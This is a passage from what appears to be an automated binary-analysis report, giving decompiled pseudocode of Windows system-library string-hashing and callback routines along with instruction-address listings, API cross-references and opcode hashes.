													_push(_t178);
													E6B265720(0x33, 0, "SXS: String hash collision chain offset at %p (= %ld) out of bounds\n", _t233);
													goto L71;
												}
											}
										}
									} else {
										if(_t220 == 0) {
											if(_t229 != 0) {
												do {
													_t198 =  *_t193 & 0x0000ffff;
													_t193 =  &(_t193[1]);
													_t187 = _t187 * 0x1003f + _t198;
													_t229 = _t229 - 1;
												} while (_t229 != 0);
											}
										} else {
											if(_t229 != 0) {
												_t220 =  *0x6b2c6d5c;
												do {
													_t208 =  *_t193 & 0x0000ffff;
													_t193 =  &(_t193[1]);
													_t229 = _t229 - 1;
													_v64 = _t208;
													if(_t208 < 0x61) {
														L34:
														_t198 = _t208 & 0x0000ffff;
													} else {
														if(_t208 > 0x7a) {
															_t235 = _t208 & 0x0000ffff;
															_t228 = ( *(_t220 + (_t235 >> 8) * 2) & 0x0000ffff) + (_t235 >> 0x00000004 & 0x0000000f);
															_t220 =  *0x6b2c6d5c;
															_t208 =  *((intOrPtr*)(_t220 + (( *( *0x6b2c6d5c + _t228 * 2) & 0x0000ffff) + (_t235 & 0x0000000f)) * 2)) + _v64;
															goto L34;
														} else {
															_t198 = (_t208 & 0x0000ffff) - 0x20;
														}
													}
													_t187 = _t187 * 0x1003f + _t198;
												} while (_t229 != 0);
												_t233 = _v40;
											}
										}
										_t193 = _v44;
										_t229 = _v68;
										 *_t233 = _t187;
										_t140 = 0;
										L18:
										if(_t140 < 0) {
											if(_t140 != 0xc000000d) {
												L32:
												return E6B21B640(_t140, _t193, _v8 ^ _t237, _t220, _t229, _t233);
											} else {
												goto L65;
											}
										} else {
											 *_t229 = _t193[0xe];
											goto L20;
										}
									}
								}
							}
						}
					}
				}
				L83:
			}
















































                                                                                                                            0x6b1f336f
                                                                                                                            0x6b1f3376
                                                                                                                            0x6b1f3378
                                                                                                                            0x6b1f337f
                                                                                                                            0x6b1f3387
                                                                                                                            0x6b1f338a
                                                                                                                            0x6b1f338d
                                                                                                                            0x6b1f3390
                                                                                                                            0x6b1f3393
                                                                                                                            0x6b1f3396
                                                                                                                            0x6b1f3399
                                                                                                                            0x6b1f339d
                                                                                                                            0x6b23d994
                                                                                                                            0x6b1f33a3
                                                                                                                            0x6b1f33a3
                                                                                                                            0x6b1f33a3
                                                                                                                            0x6b1f33ab
                                                                                                                            0x6b1f33ae
                                                                                                                            0x6b23da5a
                                                                                                                            0x6b23da5a
                                                                                                                            0x00000000
                                                                                                                            0x6b1f33b4
                                                                                                                            0x6b1f33b8
                                                                                                                            0x6b1f34ea
                                                                                                                            0x6b1f34ea
                                                                                                                            0x00000000
                                                                                                                            0x6b1f33be
                                                                                                                            0x6b1f33be
                                                                                                                            0x6b1f33c4
                                                                                                                            0x6b23d99b
                                                                                                                            0x00000000
                                                                                                                            0x6b1f33ca
                                                                                                                            0x6b1f33cc
                                                                                                                            0x6b1f3458
                                                                                                                            0x6b1f3458
                                                                                                                            0x00000000
                                                                                                                            0x6b1f33d2
                                                                                                                            0x6b1f33d2
                                                                                                                            0x6b1f33d7
                                                                                                                            0x6b23d9c2
                                                                                                                            0x00000000
                                                                                                                            0x6b1f33e5
                                                                                                                            0x6b1f33e5
                                                                                                                            0x6b1f33e8
                                                                                                                            0x6b1f33eb
                                                                                                                            0x6b1f33f0
                                                                                                                            0x6b1f33f5
                                                                                                                            0x6b23d9d7
                                                                                                                            0x6b23d9ea
                                                                                                                            0x00000000
                                                                                                                            0x6b23d9f0
                                                                                                                            0x6b23d9f0
                                                                                                                            0x6b23d9ff
                                                                                                                            0x6b23da04
                                                                                                                            0x6b23da07
                                                                                                                            0x6b1f345b
                                                                                                                            0x6b1f3461
                                                                                                                            0x6b1f3464
                                                                                                                            0x6b23da0e
                                                                                                                            0x6b23da0e
                                                                                                                            0x6b1f346a
                                                                                                                            0x6b1f3471
                                                                                                                            0x6b1f3475
                                                                                                                            0x6b1f353f
                                                                                                                            0x6b23da7c
                                                                                                                            0x6b23da82
                                                                                                                            0x6b23da84
                                                                                                                            0x6b23da89
                                                                                                                            0x6b23da8f
                                                                                                                            0x6b23da92
                                                                                                                            0x6b23da92
                                                                                                                            0x6b23da96
                                                                                                                            0x6b23da9a
                                                                                                                            0x6b23daa3
                                                                                                                            0x6b23daa8
                                                                                                                            0x6b23dac1
                                                                                                                            0x00000000
                                                                                                                            0x6b23dac7
                                                                                                                            0x6b23dac7
                                                                                                                            0x6b23daca
                                                                                                                            0x00000000
                                                                                                                            0x6b23daca
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23dacd
                                                                                                                            0x6b23dacd
                                                                                                                            0x6b23dad0
                                                                                                                            0x6b23dad0
                                                                                                                            0x6b23dad5
                                                                                                                            0x00000000
                                                                                                                            0x6b1f354f
                                                                                                                            0x6b1f354f
                                                                                                                            0x6b1f3555
                                                                                                                            0x6b1f355c
                                                                                                                            0x6b1f3562
                                                                                                                            0x6b1f356e
                                                                                                                            0x6b1f357a
                                                                                                                            0x6b1f3581
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3587
                                                                                                                            0x6b1f3589
                                                                                                                            0x6b1f358e
                                                                                                                            0x6b1f3590
                                                                                                                            0x6b1f3594
                                                                                                                            0x6b1f3599
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3599
                                                                                                                            0x6b1f3590
                                                                                                                            0x6b1f359b
                                                                                                                            0x6b1f359e
                                                                                                                            0x6b1f35a2
                                                                                                                            0x6b1f35a4
                                                                                                                            0x6b1f35a4
                                                                                                                            0x6b1f35b0
                                                                                                                            0x6b1f35b0
                                                                                                                            0x6b1f35b7
                                                                                                                            0x6b1f35bb
                                                                                                                            0x6b1f35c5
                                                                                                                            0x6b1f35d6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23da64
                                                                                                                            0x6b23da69
                                                                                                                            0x00000000
                                                                                                                            0x6b23da6f
                                                                                                                            0x6b23da71
                                                                                                                            0x00000000
                                                                                                                            0x6b23da77
                                                                                                                            0x00000000
                                                                                                                            0x6b23da77
                                                                                                                            0x6b23da71
                                                                                                                            0x00000000
                                                                                                                            0x6b23da69
                                                                                                                            0x6b1f35de
                                                                                                                            0x00000000
                                                                                                                            0x6b1f35e4
                                                                                                                            0x6b1f35e6
                                                                                                                            0x00000000
                                                                                                                            0x6b1f35e8
                                                                                                                            0x00000000
                                                                                                                            0x6b1f35e8
                                                                                                                            0x6b1f35e6
                                                                                                                            0x6b1f35de
                                                                                                                            0x6b1f3581
                                                                                                                            0x6b1f347b
                                                                                                                            0x6b1f347e
                                                                                                                            0x6b1f3486
                                                                                                                            0x6b1f3488
                                                                                                                            0x6b1f348a
                                                                                                                            0x6b1f348d
                                                                                                                            0x6b1f35ed
                                                                                                                            0x6b1f3493
                                                                                                                            0x6b1f3498
                                                                                                                            0x6b1f3498
                                                                                                                            0x6b1f349a
                                                                                                                            0x6b1f349d
                                                                                                                            0x6b1f349f
                                                                                                                            0x6b1f34a2
                                                                                                                            0x6b1f34a9
                                                                                                                            0x6b1f34ab
                                                                                                                            0x6b1f34ad
                                                                                                                            0x6b1f34b0
                                                                                                                            0x6b1f34b5
                                                                                                                            0x00000000
                                                                                                                            0x6b1f34b7
                                                                                                                            0x6b1f34b7
                                                                                                                            0x6b1f34c0
                                                                                                                            0x6b1f34c0
                                                                                                                            0x6b1f34c5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f34cb
                                                                                                                            0x6b1f34d1
                                                                                                                            0x6b1f35f4
                                                                                                                            0x6b1f35fa
                                                                                                                            0x6b23da20
                                                                                                                            0x6b23da23
                                                                                                                            0x6b23da24
                                                                                                                            0x6b23da27
                                                                                                                            0x6b23da2a
                                                                                                                            0x6b23da35
                                                                                                                            0x6b23da3d
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3600
                                                                                                                            0x6b1f3600
                                                                                                                            0x6b1f3607
                                                                                                                            0x6b1f360b
                                                                                                                            0x6b1f3614
                                                                                                                            0x6b1f3625
                                                                                                                            0x6b23da15
                                                                                                                            0x6b23da18
                                                                                                                            0x00000000
                                                                                                                            0x6b1f362b
                                                                                                                            0x6b1f362b
                                                                                                                            0x6b1f362b
                                                                                                                            0x6b1f362e
                                                                                                                            0x6b1f3630
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3640
                                                                                                                            0x6b1f3640
                                                                                                                            0x6b1f3645
                                                                                                                            0x6b1f364c
                                                                                                                            0x6b1f3656
                                                                                                                            0x6b1f365c
                                                                                                                            0x6b1f3664
                                                                                                                            0x6b1f3669
                                                                                                                            0x6b1f3669
                                                                                                                            0x6b1f3664
                                                                                                                            0x6b1f367e
                                                                                                                            0x6b1f367e
                                                                                                                            0x6b1f3630
                                                                                                                            0x6b1f3625
                                                                                                                            0x6b1f34df
                                                                                                                            0x6b1f34df
                                                                                                                            0x6b1f34df
                                                                                                                            0x6b1f34e2
                                                                                                                            0x6b1f34e3
                                                                                                                            0x6b1f34e8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f34e8
                                                                                                                            0x00000000
                                                                                                                            0x6b1f34d1
                                                                                                                            0x6b23da47
                                                                                                                            0x6b23da52
                                                                                                                            0x00000000
                                                                                                                            0x6b23da57
                                                                                                                            0x6b1f34b5
                                                                                                                            0x6b1f3475
                                                                                                                            0x6b1f33fb
                                                                                                                            0x6b1f33fd
                                                                                                                            0x6b23d9a4
                                                                                                                            0x6b23d9aa
                                                                                                                            0x6b23d9aa
                                                                                                                            0x6b23d9ad
                                                                                                                            0x6b23d9b6
                                                                                                                            0x6b23d9b8
                                                                                                                            0x6b23d9b8
                                                                                                                            0x6b23d9bd
                                                                                                                            0x6b1f3403
                                                                                                                            0x6b1f3405
                                                                                                                            0x6b1f3407
                                                                                                                            0x6b1f3410
                                                                                                                            0x6b1f3410
                                                                                                                            0x6b1f3413
                                                                                                                            0x6b1f3416
                                                                                                                            0x6b1f3417
                                                                                                                            0x6b1f341d
                                                                                                                            0x6b1f3535
                                                                                                                            0x6b1f3535
                                                                                                                            0x6b1f3423
                                                                                                                            0x6b1f3426
                                                                                                                            0x6b1f3502
                                                                                                                            0x6b1f3519
                                                                                                                            0x6b1f3525
                                                                                                                            0x6b1f3531
                                                                                                                            0x00000000
                                                                                                                            0x6b1f342c
                                                                                                                            0x6b1f342f
                                                                                                                            0x6b1f342f
                                                                                                                            0x6b1f3426
                                                                                                                            0x6b1f3438
                                                                                                                            0x6b1f343a
                                                                                                                            0x6b1f343e
                                                                                                                            0x6b1f343e
                                                                                                                            0x6b1f3405
                                                                                                                            0x6b1f3441
                                                                                                                            0x6b1f3444
                                                                                                                            0x6b1f3447
                                                                                                                            0x6b1f3449
                                                                                                                            0x6b1f344b
                                                                                                                            0x6b1f344d
                                                                                                                            0x6b23d9d1
                                                                                                                            0x6b1f34f2
                                                                                                                            0x6b1f34ff
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3453
                                                                                                                            0x6b1f3456
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3456
                                                                                                                            0x6b1f344d
                                                                                                                            0x6b1f33f5
                                                                                                                            0x6b1f33d7
                                                                                                                            0x6b1f33cc
                                                                                                                            0x6b1f33c4
                                                                                                                            0x6b1f33b8
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • bsearch.1105(?,?,00000000,00000018,6B208C30,6B1F2A25,00000000,00000000), ref: 6B1F3575
                                                                                                                            • RtlCompareUnicodeString.1105(?,?,?,?,?,6B1F2A25,00000000,00000000), ref: 6B1F35CF
                                                                                                                            • RtlHashUnicodeString.1105(?,?,00000000,?,6B1F2A25,00000000,00000000), ref: 6B23D9E3
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.,?,?,?,00000000,?,6B1F2A25,00000000,00000000), ref: 6B23D9FF
                                                                                                                            Strings
                                                                                                                            • SsHd, xrefs: 6B1F33A5
                                                                                                                            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 6B23DA49
                                                                                                                            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 6B23DA2C
                                                                                                                            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 6B23D9F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUnicode$CompareHashPrintbsearch
                                                                                                                            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                            • API String ID: 856964118-2905229100
                                                                                                                            • Opcode ID: 42740e4ef1d6740df877cd2541d3792c726f9690592e05750e365beff2d02887
                                                                                                                            • Instruction ID: 29764d7c7ba75727191c9ba263454068489d2b407b5a217633aff3925e47afca
                                                                                                                            • Opcode Fuzzy Hash: 42740e4ef1d6740df877cd2541d3792c726f9690592e05750e365beff2d02887
                                                                                                                            • Instruction Fuzzy Hash: 92D1B171E04219EBCB25CF98D8D0A9DB7F5FF59304F15409AE805AB251D339D982CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D3ACA, Relevance: 21.3, APIs: 14, Instructions: 348COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E6B1D3ACA(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t197;
				intOrPtr _t200;
				intOrPtr _t206;
				intOrPtr _t209;
				intOrPtr _t217;
				signed int _t224;
				signed int _t226;
				signed int _t229;
				signed int _t230;
				signed int _t233;
				intOrPtr _t238;
				signed int _t246;
				signed int _t249;
				char* _t252;
				intOrPtr _t257;
				signed int _t272;
				intOrPtr _t280;
				intOrPtr _t281;
				signed char _t286;
				signed int _t291;
				signed int _t292;
				intOrPtr _t299;
				intOrPtr _t301;
				signed int _t307;
				intOrPtr* _t308;
				signed int _t309;
				intOrPtr _t312;
				signed int* _t313;
				intOrPtr _t315;
				signed int _t316;
				void* _t317;

				_push(0x84);
				_push(0x6b2af4d0);
				E6B22D0E8(__ebx, __edi, __esi);
				_t312 = __edx;
				 *((intOrPtr*)(_t317 - 0x38)) = __edx;
				 *((intOrPtr*)(_t317 - 0x20)) = __ecx;
				_t307 = 0;
				 *(_t317 - 0x74) = 0;
				 *((intOrPtr*)(_t317 - 0x78)) = 0;
				_t272 = 0;
				 *(_t317 - 0x60) = 0;
				 *((intOrPtr*)(_t317 - 0x68)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t197 = __edx + 0x28;
				 *((intOrPtr*)(_t317 - 0x7c)) = _t197;
				 *((intOrPtr*)(_t317 - 0x88)) = _t197;
				E6B1F2280(_t197, _t197);
				_t280 =  *((intOrPtr*)(_t312 + 0x2c));
				 *((intOrPtr*)(_t317 - 0x34)) = _t280;
				L1:
				while(1) {
					if(_t280 == _t312 + 0x2c) {
						E6B1EFFB0(_t272, _t307,  *((intOrPtr*)(_t317 - 0x7c)));
						asm("sbb ebx, ebx");
						return E6B22D130( ~_t272 & 0xc000022d, _t307, _t312);
					}
					_t15 = _t280 - 4; // -4
					_t200 = _t15;
					 *((intOrPtr*)(_t317 - 0x70)) = _t200;
					 *((intOrPtr*)(_t317 - 0x8c)) = _t200;
					 *((intOrPtr*)(_t317 - 0x6c)) = _t200;
					_t308 = 0x7ffe0010;
					_t313 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									 *(_t317 - 0x30) =  *0x6b2c8628;
									 *(_t317 - 0x44) =  *0x6b2c862c;
									 *(_t317 - 0x28) =  *_t313;
									 *(_t317 - 0x58) = _t313[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t281 =  *0x7ffe0008;
										__eflags = _t301 -  *_t308;
										if(_t301 ==  *_t308) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t313 = 0x7ffe03b0;
									_t309 =  *0x7ffe03b0;
									 *(_t317 - 0x40) = _t309;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t317 - 0x3c)) = _t206;
									__eflags =  *(_t317 - 0x28) - _t309;
									_t308 = 0x7ffe0010;
								} while ( *(_t317 - 0x28) != _t309);
								__eflags =  *(_t317 - 0x58) - _t206;
							} while ( *(_t317 - 0x58) != _t206);
							 *(_t317 - 0x28) =  *0x6b2c862c;
							__eflags =  *(_t317 - 0x30) -  *0x6b2c8628;
							_t308 = 0x7ffe0010;
						} while ( *(_t317 - 0x30) !=  *0x6b2c8628);
						__eflags =  *(_t317 - 0x44) -  *(_t317 - 0x28);
					} while ( *(_t317 - 0x44) !=  *(_t317 - 0x28));
					_t315 =  *((intOrPtr*)(_t317 - 0x6c));
					_t307 = 0;
					_t272 =  *(_t317 - 0x60);
					asm("sbb edx, [ebp-0x3c]");
					asm("sbb edx, eax");
					 *(_t317 - 0x28) = _t281 -  *(_t317 - 0x40) -  *(_t317 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x2c]");
					_t209 =  *((intOrPtr*)(_t317 - 0x20));
					_t286 =  *(_t315 + 0x24) &  *(_t209 + 0x18);
					 *(_t317 - 0x40) = _t286;
					__eflags =  *(_t315 + 0x34);
					if( *(_t315 + 0x34) != 0) {
						L37:
						 *((intOrPtr*)(_t317 - 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t317 - 0x34))));
						E6B20DF4C(_t317 - 0x78, _t315, _t317 - 0x74, _t317 - 0x78);
						_t316 =  *(_t317 - 0x74);
						__eflags = _t316;
						_t280 =  *((intOrPtr*)(_t317 - 0x34));
						if(_t316 != 0) {
							 *0x6b2cb1e0( *((intOrPtr*)(_t317 - 0x78)));
							 *_t316();
							_t280 =  *((intOrPtr*)(_t317 - 0x34));
						}
						_t312 =  *((intOrPtr*)(_t317 - 0x38));
						continue;
					}
					__eflags = _t286;
					if(_t286 == 0) {
						goto L37;
					}
					 *(_t317 - 0x5c) = _t286;
					_t45 = _t317 - 0x5c;
					 *_t45 =  *(_t317 - 0x5c) & 0x00000001;
					__eflags =  *_t45;
					if( *_t45 == 0) {
						L40:
						__eflags = _t286 & 0xfffffffe;
						if((_t286 & 0xfffffffe) != 0) {
							__eflags =  *((intOrPtr*)(_t315 + 0x64)) - _t307;
							if( *((intOrPtr*)(_t315 + 0x64)) == _t307) {
								L14:
								__eflags =  *(_t315 + 0x40) - _t307;
								if( *(_t315 + 0x40) != _t307) {
									__eflags = _t301 -  *(_t315 + 0x4c);
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t299 =  *((intOrPtr*)(_t317 - 0x20));
										__eflags =  *(_t315 + 0x5c) -  *((intOrPtr*)(_t299 + 0x10));
										if( *(_t315 + 0x5c) >=  *((intOrPtr*)(_t299 + 0x10))) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t317 - 0x28) -  *(_t315 + 0x48);
									if( *(_t317 - 0x28) >=  *(_t315 + 0x48)) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *((intOrPtr*)(_t317 + 8)) - _t307;
								if( *((intOrPtr*)(_t317 + 8)) != _t307) {
									__eflags =  *((intOrPtr*)(_t315 + 0x58)) - _t307;
									if( *((intOrPtr*)(_t315 + 0x58)) != _t307) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t317 - 0x24) = _t307;
								 *(_t317 - 0x30) = _t307;
								 *((intOrPtr*)(_t317 - 0x2c)) =  *((intOrPtr*)(_t315 + 0x10));
								_t217 =  *((intOrPtr*)(_t315 + 0xc));
								 *((intOrPtr*)(_t317 - 0x4c)) =  *((intOrPtr*)(_t217 + 0x10));
								 *((intOrPtr*)(_t317 - 0x48)) =  *((intOrPtr*)(_t217 + 0x14));
								 *(_t317 - 0x58) =  *(_t217 + 0x24);
								 *((intOrPtr*)(_t317 - 0x3c)) =  *((intOrPtr*)(_t315 + 0x14));
								 *((intOrPtr*)(_t317 - 0x64)) =  *((intOrPtr*)(_t315 + 0x18));
								 *(_t315 + 0x60) =  *( *[fs:0x18] + 0x24);
								_t224 =  *((intOrPtr*)(_t317 - 0x38)) + 0x28;
								 *(_t317 - 0x94) = _t224;
								_t291 = _t224;
								 *(_t317 - 0x28) = _t291;
								 *(_t317 - 0x90) = _t291;
								E6B1EFFB0(_t272, _t307, _t224);
								_t292 = _t307;
								 *(_t317 - 0x54) = _t292;
								_t226 = _t307;
								 *(_t317 - 0x50) = _t226;
								 *(_t317 - 0x44) = _t226;
								__eflags =  *(_t315 + 0x28);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t229 = 0;
									_t230 = _t229 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t317 - 0x50) = _t230;
									 *(_t317 - 0x44) = _t230;
									__eflags = _t230;
									if(_t230 != 0) {
										goto L17;
									}
									__eflags =  *((intOrPtr*)(_t317 + 8)) - 1;
									if( *((intOrPtr*)(_t317 + 8)) == 1) {
										E6B1F2280( *(_t315 + 0x28) + 0x10,  *(_t315 + 0x28) + 0x10);
										_t230 = 1;
										 *(_t317 - 0x50) = 1;
										 *(_t317 - 0x44) = 1;
										goto L17;
									}
									_t233 = _t230 + 1;
									L35:
									 *( *((intOrPtr*)(_t317 - 0x70)) + 0x58) = _t233;
									__eflags = _t292;
									if(_t292 == 0) {
										E6B1F2280(_t233,  *(_t317 - 0x28));
									}
									 *(_t315 + 0x60) = _t307;
									goto L37;
								}
								L17:
								__eflags =  *(_t315 + 0x34) - _t307;
								if( *(_t315 + 0x34) != _t307) {
									L26:
									__eflags =  *(_t317 - 0x50);
									if( *(_t317 - 0x50) != 0) {
										_t230 = E6B1EFFB0(_t272, _t307,  *(_t315 + 0x28) + 0x10);
									}
									__eflags =  *(_t317 - 0x30);
									if( *(_t317 - 0x30) == 0) {
										L71:
										_t292 =  *(_t317 - 0x54);
										L34:
										_t233 = _t307;
										goto L35;
									}
									E6B1F2280(_t230,  *(_t317 - 0x94));
									_t292 = 1;
									 *(_t317 - 0x54) = 1;
									__eflags =  *(_t317 - 0x24) - 0xc000022d;
									if( *(_t317 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t315 + 0x20) & 0x00000004;
										if(( *(_t315 + 0x20) & 0x00000004) == 0) {
											goto L34;
										}
										_t272 = 1;
										__eflags = 1;
										 *(_t317 - 0x60) = 1;
										E6B2630AE(_t315,  *(_t317 - 0x24),  *( *((intOrPtr*)(_t317 - 0x20)) + 0x10));
										goto L71;
									}
									__eflags =  *(_t317 - 0x24) - 0xc0000017;
									if( *(_t317 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t315 + 0x1c);
									if( *(_t315 + 0x1c) != 0) {
										_t238 =  *((intOrPtr*)(_t317 - 0x20));
										__eflags =  *((intOrPtr*)(_t238 + 0x10)) -  *(_t315 + 0x1c);
										if( *((intOrPtr*)(_t238 + 0x10)) -  *(_t315 + 0x1c) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t315 + 0x20) & 0x00000004;
										if(( *(_t315 + 0x20) & 0x00000004) != 0) {
											__eflags =  *(_t315 + 0x50) - _t307;
											if( *(_t315 + 0x50) > _t307) {
												 *(_t315 + 0x40) = _t307;
												 *(_t315 + 0x54) = _t307;
												 *(_t315 + 0x48) = _t307;
												 *(_t315 + 0x4c) = _t307;
												 *(_t315 + 0x50) = _t307;
												 *(_t315 + 0x5c) = _t307;
											}
										}
										goto L34;
									}
									L31:
									 *(_t315 + 0x1c) =  *( *((intOrPtr*)(_t317 - 0x20)) + 0x10);
									goto L32;
								}
								 *(_t317 - 0x30) = 1;
								 *((intOrPtr*)(_t317 - 0x80)) = 1;
								 *((intOrPtr*)(_t317 - 0x64)) = E6B1D3E80( *((intOrPtr*)(_t317 - 0x64)));
								 *(_t317 - 4) = _t307;
								__eflags =  *(_t317 - 0x5c);
								if( *(_t317 - 0x5c) != 0) {
									_t257 =  *((intOrPtr*)(_t317 - 0x20));
									 *0x6b2cb1e0( *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)),  *((intOrPtr*)(_t257 + 0x10)),  *(_t317 - 0x58),  *((intOrPtr*)(_t317 - 0x3c)),  *((intOrPtr*)(_t317 - 0x68)),  *((intOrPtr*)(_t257 + 0x14)));
									 *(_t317 - 0x24) =  *((intOrPtr*)(_t317 - 0x2c))();
								}
								_t246 =  *(_t317 - 0x40);
								__eflags = _t246 & 0x00000010;
								if((_t246 & 0x00000010) != 0) {
									__eflags =  *(_t315 + 0x34) - _t307;
									if( *(_t315 + 0x34) != _t307) {
										goto L21;
									}
									__eflags =  *(_t317 - 0x24);
									if( *(_t317 - 0x24) >= 0) {
										L64:
										 *0x6b2cb1e0( *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)), _t307,  *(_t317 - 0x58),  *((intOrPtr*)(_t317 - 0x3c)), _t307, _t307);
										 *((intOrPtr*)(_t317 - 0x2c))();
										 *(_t317 - 0x24) = _t307;
										_t246 =  *(_t317 - 0x40);
										goto L21;
									}
									__eflags =  *(_t315 + 0x20) & 0x00000004;
									if(( *(_t315 + 0x20) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t246 & 0xffffffee;
									if((_t246 & 0xffffffee) != 0) {
										 *(_t317 - 0x24) = _t307;
										 *0x6b2cb1e0( *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)),  *((intOrPtr*)(_t317 - 0x3c)), _t246);
										 *((intOrPtr*)(_t317 - 0x2c))();
									}
									_t249 = E6B1F7D50();
									__eflags = _t249;
									if(_t249 != 0) {
										_t252 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t252 = 0x7ffe038e;
									}
									__eflags =  *_t252;
									if( *_t252 != 0) {
										_t252 = E6B262E14( *( *((intOrPtr*)(_t317 - 0x20)) + 0x10), _t315,  *((intOrPtr*)(_t317 - 0x38)),  *((intOrPtr*)(_t317 - 0x2c)),  *(_t317 - 0x40),  *(_t317 - 0x24),  *((intOrPtr*)(_t317 - 0x4c)),  *((intOrPtr*)(_t317 - 0x48)));
									}
									 *(_t317 - 4) = 0xfffffffe;
									E6B1D3E6B(_t252);
									_t230 = E6B1D3E80( *((intOrPtr*)(_t317 - 0x64)));
									goto L26;
								}
							}
						}
						__eflags = _t286 & 0x00000010;
						if((_t286 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t315 + 0x1c);
					if( *(_t315 + 0x1c) != 0) {
						__eflags =  *((intOrPtr*)(_t209 + 0x10)) -  *(_t315 + 0x1c);
						if( *((intOrPtr*)(_t209 + 0x10)) -  *(_t315 + 0x1c) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}


































                                                                                                                            0x6b1d3aca
                                                                                                                            0x6b1d3acf
                                                                                                                            0x6b1d3ad4
                                                                                                                            0x6b1d3ad9
                                                                                                                            0x6b1d3adb
                                                                                                                            0x6b1d3ae0
                                                                                                                            0x6b1d3ae3
                                                                                                                            0x6b1d3ae5
                                                                                                                            0x6b1d3ae8
                                                                                                                            0x6b1d3aeb
                                                                                                                            0x6b1d3aed
                                                                                                                            0x6b1d3af5
                                                                                                                            0x6b1d3af8
                                                                                                                            0x6b1d3afb
                                                                                                                            0x6b1d3afe
                                                                                                                            0x6b1d3b05
                                                                                                                            0x6b1d3b0a
                                                                                                                            0x6b1d3b0d
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3b10
                                                                                                                            0x6b1d3b15
                                                                                                                            0x6b1d3b1a
                                                                                                                            0x6b1d3b21
                                                                                                                            0x6b1d3b30
                                                                                                                            0x6b1d3b30
                                                                                                                            0x6b1d3b33
                                                                                                                            0x6b1d3b33
                                                                                                                            0x6b1d3b36
                                                                                                                            0x6b1d3b39
                                                                                                                            0x6b1d3b3f
                                                                                                                            0x6b1d3b47
                                                                                                                            0x6b1d3b4a
                                                                                                                            0x6b1d3b4a
                                                                                                                            0x6b1d3b4f
                                                                                                                            0x6b1d3b4f
                                                                                                                            0x6b1d3b4f
                                                                                                                            0x6b1d3b4f
                                                                                                                            0x6b1d3b4f
                                                                                                                            0x6b1d3b54
                                                                                                                            0x6b1d3b5c
                                                                                                                            0x6b1d3b61
                                                                                                                            0x6b1d3b67
                                                                                                                            0x6b1d3b6f
                                                                                                                            0x6b1d3b6f
                                                                                                                            0x6b1d3b71
                                                                                                                            0x6b1d3b75
                                                                                                                            0x6b1d3b77
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3e6c
                                                                                                                            0x6b1d3e6c
